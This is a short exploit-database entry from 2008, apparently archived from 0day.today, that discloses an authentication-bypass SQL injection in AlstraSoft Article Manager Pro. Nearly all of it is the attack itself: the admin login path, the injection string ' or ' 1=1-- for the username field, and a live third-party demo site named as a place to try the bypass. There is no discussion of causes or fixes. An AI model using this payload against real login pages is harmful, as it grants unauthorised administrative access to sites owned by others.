id: 4164
date: 11/12/2008
title: AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln
author: ZoRLu
cves: 

===============================================================
AlstraSoft Article Manager Pro (Auth Bypass) SQL Injection Vuln
===============================================================


[~] AlstraSoft Article Manager Pro auth bypass
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 12.11.2008
[~]
[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
[~]
[~] my bug number now: 36
[~]
[~] my target bug number: 100
[~]
[~] -----------------------------------------------------------


Exploit:

localhost/script/admin/admin.php

username: ' or ' 1=1--

password: ZoRLu



admin login for demo:

http://www.blizsoft.com/article/admin/admin.php

username: ' or ' 1=1--

password: ZoRLu




#  0day.today [2023-03-26]  #